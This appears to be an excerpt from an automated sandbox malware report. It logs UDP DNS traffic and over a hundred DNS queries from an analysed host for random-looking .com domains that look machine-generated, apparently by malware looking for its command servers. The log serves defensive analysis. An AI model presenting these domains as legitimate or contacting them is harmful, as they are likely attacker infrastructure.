                                                                                                                                                                                                          Sep 8, 2024 10:54:41.525201082 CEST53583951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.526659966 CEST5404253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.527888060 CEST53568871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528104067 CEST53608851.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528109074 CEST5151953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528492928 CEST53591081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528599977 CEST53605571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.537563086 CEST53540421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.537590027 CEST53515191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.539391994 CEST53528411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.539887905 CEST6120653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.540117979 CEST5404553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.540657043 CEST5997653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.546624899 CEST5885653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548027039 CEST6316453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548223972 CEST6298453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548399925 CEST6525853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548439980 CEST6063353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548563004 CEST5944253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.551279068 CEST53540451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.556535959 CEST53588561.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.557203054 CEST53629841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.557756901 CEST53612061.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.557990074 CEST5181553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558073044 CEST5585253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558141947 CEST53606331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558645010 CEST53599761.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558659077 CEST53652581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.559452057 CEST6437453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.563307047 CEST53631641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.565335989 CEST5022453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.567322969 CEST53594421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.569783926 CEST53643741.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573093891 CEST6170453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573479891 CEST6128453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573714018 CEST6284853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.574079037 CEST6347453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.576103926 CEST6292053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.576924086 CEST53558521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.578700066 CEST6165453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.584055901 CEST53612841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.588280916 CEST53616541.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.590027094 CEST53518151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.590759993 CEST53628481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.592622995 CEST53629201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.598552942 CEST53502241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.604491949 CEST53617041.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.606081009 CEST53634741.1.1.1192.168.2.9
Timestamp, Source IP, Dest IP, Trans ID, OP Code, Name, Type, Class, DNS over HTTPS
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.182841063 CEST192.168.2.91.1.1.10xf308Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.184592962 CEST192.168.2.91.1.1.10x10dStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.186197042 CEST192.168.2.91.1.1.10x7b99Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.188030958 CEST192.168.2.91.1.1.10xde00Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.188446999 CEST192.168.2.91.1.1.10xf990Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.215481997 CEST192.168.2.91.1.1.10x3563Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.215867043 CEST192.168.2.91.1.1.10xd877Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.217925072 CEST192.168.2.91.1.1.10xee12Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.217968941 CEST192.168.2.91.1.1.10x5f46Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.225936890 CEST192.168.2.91.1.1.10xee91Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.226270914 CEST192.168.2.91.1.1.10x3fbStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.226460934 CEST192.168.2.91.1.1.10x5d22Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.427602053 CEST192.168.2.91.1.1.10xeb48Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.428092003 CEST192.168.2.91.1.1.10x650aStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.452250004 CEST192.168.2.91.1.1.10x3ee2Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.455549002 CEST192.168.2.91.1.1.10x7cbdStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.455970049 CEST192.168.2.91.1.1.10xc199Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.455970049 CEST192.168.2.91.1.1.10xd83fStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.513669014 CEST192.168.2.91.1.1.10x5526Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.513932943 CEST192.168.2.91.1.1.10x5a1bStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514061928 CEST192.168.2.91.1.1.10xf447Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514456987 CEST192.168.2.91.1.1.10x8758Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514765978 CEST192.168.2.91.1.1.10xdb0aStandard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514969110 CEST192.168.2.91.1.1.10x7a14Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.515242100 CEST192.168.2.91.1.1.10xa69eStandard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516216040 CEST192.168.2.91.1.1.10xdc3eStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516247988 CEST192.168.2.91.1.1.10xda5dStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516614914 CEST192.168.2.91.1.1.10x2760Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516887903 CEST192.168.2.91.1.1.10x73daStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.517261028 CEST192.168.2.91.1.1.10xf93bStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.517724037 CEST192.168.2.91.1.1.10x2e8bStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.517802954 CEST192.168.2.91.1.1.10x13d6Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.518204927 CEST192.168.2.91.1.1.10xddc4Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.518501997 CEST192.168.2.91.1.1.10xe840Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519025087 CEST192.168.2.91.1.1.10x2247Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519113064 CEST192.168.2.91.1.1.10xeee1Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519613028 CEST192.168.2.91.1.1.10x859Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519926071 CEST192.168.2.91.1.1.10x405fStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.520113945 CEST192.168.2.91.1.1.10x22ceStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.520618916 CEST192.168.2.91.1.1.10xf3a2Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.521822929 CEST192.168.2.91.1.1.10x2da1Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.522270918 CEST192.168.2.91.1.1.10x57e2Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.544584990 CEST192.168.2.91.1.1.10xc1beStandard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.544787884 CEST192.168.2.91.1.1.10xa7caStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.545425892 CEST192.168.2.91.1.1.10x667bStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.546279907 CEST192.168.2.91.1.1.10x150aStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.555068970 CEST192.168.2.91.1.1.10x3c7bStandard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.557391882 CEST192.168.2.91.1.1.10x307eStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.558974028 CEST192.168.2.91.1.1.10x8002Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.568423986 CEST192.168.2.91.1.1.10x6402Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.569097042 CEST192.168.2.91.1.1.10xcf1cStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.570606947 CEST192.168.2.91.1.1.10x912cStandard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.579932928 CEST192.168.2.91.1.1.10x6167Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.173449039 CEST192.168.2.91.1.1.10xff90Standard query (0)www.gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.626854897 CEST192.168.2.91.1.1.10xb19cStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.626921892 CEST192.168.2.91.1.1.10x1552Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.627098083 CEST192.168.2.91.1.1.10x7bf9Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.627549887 CEST192.168.2.91.1.1.10x8b8Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.632281065 CEST192.168.2.91.1.1.10xa3cdStandard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.636965990 CEST192.168.2.91.1.1.10x4694Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.637690067 CEST192.168.2.91.1.1.10xd3d1Standard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.637909889 CEST192.168.2.91.1.1.10xbdcStandard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.638516903 CEST192.168.2.91.1.1.10xad92Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.639735937 CEST192.168.2.91.1.1.10x778dStandard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.640543938 CEST192.168.2.91.1.1.10xcb6dStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.641560078 CEST192.168.2.91.1.1.10x4930Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.643292904 CEST192.168.2.91.1.1.10x7c8eStandard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.644346952 CEST192.168.2.91.1.1.10x9ddaStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.645701885 CEST192.168.2.91.1.1.10x46f1Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.656855106 CEST192.168.2.91.1.1.10x9126Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.657042980 CEST192.168.2.91.1.1.10xcc0cStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.657768011 CEST192.168.2.91.1.1.10x1651Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.658020020 CEST192.168.2.91.1.1.10x97c1Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.662659883 CEST192.168.2.91.1.1.10x68e1Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.665349960 CEST192.168.2.91.1.1.10x5c1bStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.666011095 CEST192.168.2.91.1.1.10x1c57Standard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.666882038 CEST192.168.2.91.1.1.10x26fcStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.669723034 CEST192.168.2.91.1.1.10xdba1Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.678649902 CEST192.168.2.91.1.1.10xf46fStandard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.679527044 CEST192.168.2.91.1.1.10xfe8eStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.682180882 CEST192.168.2.91.1.1.10x9c2cStandard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.682349920 CEST192.168.2.91.1.1.10x594bStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.682502031 CEST192.168.2.91.1.1.10x587fStandard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.682643890 CEST192.168.2.91.1.1.10x121dStandard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.717139006 CEST192.168.2.91.1.1.10x17bcStandard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.719717026 CEST192.168.2.91.1.1.10x796eStandard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.118935108 CEST192.168.2.91.1.1.10x825aStandard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.119184017 CEST192.168.2.91.1.1.10x21a3Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.136405945 CEST192.168.2.91.1.1.10xdc33Standard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.138392925 CEST192.168.2.91.1.1.10x1d65Standard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.138581038 CEST192.168.2.91.1.1.10xbf0fStandard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.139226913 CEST192.168.2.91.1.1.10x3355Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.139244080 CEST192.168.2.91.1.1.10x8d04Standard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.139800072 CEST192.168.2.91.1.1.10x5c6bStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.140284061 CEST192.168.2.91.1.1.10x5995Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.156384945 CEST192.168.2.91.1.1.10x29d4Standard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.163805008 CEST192.168.2.91.1.1.10x7736Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.164083004 CEST192.168.2.91.1.1.10xd5c5Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.165591955 CEST192.168.2.91.1.1.10xdce9Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.166536093 CEST192.168.2.91.1.1.10xa830Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.167038918 CEST192.168.2.91.1.1.10xd444Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.167217970 CEST192.168.2.91.1.1.10xffd6Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.168637037 CEST192.168.2.91.1.1.10x63d8Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.168809891 CEST192.168.2.91.1.1.10xf862Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.169862986 CEST192.168.2.91.1.1.10xf63dStandard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.170093060 CEST192.168.2.91.1.1.10x8a8cStandard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.170330048 CEST192.168.2.91.1.1.10x14c5Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.170488119 CEST192.168.2.91.1.1.10x37b8Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.172931910 CEST192.168.2.91.1.1.10xa32bStandard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.173250914 CEST192.168.2.91.1.1.10xaeaeStandard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.174129009 CEST192.168.2.91.1.1.10x67faStandard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.174700022 CEST192.168.2.91.1.1.10xb8c5Standard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.176898003 CEST192.168.2.91.1.1.10x5b39Standard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.177109957 CEST192.168.2.91.1.1.10x5e80Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.177283049 CEST192.168.2.91.1.1.10xb30aStandard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.177474976 CEST192.168.2.91.1.1.10xde55Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.178239107 CEST192.168.2.91.1.1.10xe073Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.178271055 CEST192.168.2.91.1.1.10x2e0eStandard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.178515911 CEST192.168.2.91.1.1.10x372Standard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.181864023 CEST192.168.2.91.1.1.10x18adStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.182040930 CEST192.168.2.91.1.1.10xa242Standard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.183033943 CEST192.168.2.91.1.1.10x2c5bStandard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.183281898 CEST192.168.2.91.1.1.10x47beStandard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.183458090 CEST192.168.2.91.1.1.10xadebStandard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.185520887 CEST192.168.2.91.1.1.10x2210Standard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.197315931 CEST192.168.2.91.1.1.10x8f53Standard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199126959 CEST192.168.2.91.1.1.10x54eaStandard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199289083 CEST192.168.2.91.1.1.10x5daaStandard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199444056 CEST192.168.2.91.1.1.10xc72aStandard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199636936 CEST192.168.2.91.1.1.10x2d37Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199773073 CEST192.168.2.91.1.1.10xd5f7Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199942112 CEST192.168.2.91.1.1.10xfe9bStandard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199942112 CEST192.168.2.91.1.1.10x6f75Standard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.200110912 CEST192.168.2.91.1.1.10x9867Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.200160980 CEST192.168.2.91.1.1.10xb525Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.200258970 CEST192.168.2.91.1.1.10x873dStandard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.200361967 CEST192.168.2.91.1.1.10xed7Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.200539112 CEST192.168.2.91.1.1.10x4f02Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.201138973 CEST192.168.2.91.1.1.10x58d8Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.201319933 CEST192.168.2.91.1.1.10x90daStandard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.201467037 CEST192.168.2.91.1.1.10xa2e7Standard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.201638937 CEST192.168.2.91.1.1.10xb619Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.206682920 CEST192.168.2.91.1.1.10xe2afStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.207171917 CEST192.168.2.91.1.1.10x64a5Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.207171917 CEST192.168.2.91.1.1.10xc4d4Standard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.207746983 CEST192.168.2.91.1.1.10xc908Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.526453972 CEST192.168.2.91.1.1.10x3507Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.526973963 CEST192.168.2.91.1.1.10xe7e4Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.531256914 CEST192.168.2.91.1.1.10xe1bStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.532898903 CEST192.168.2.91.1.1.10x5bf2Standard query (0)pufytev.comA (IP address)IN (0x0001)false
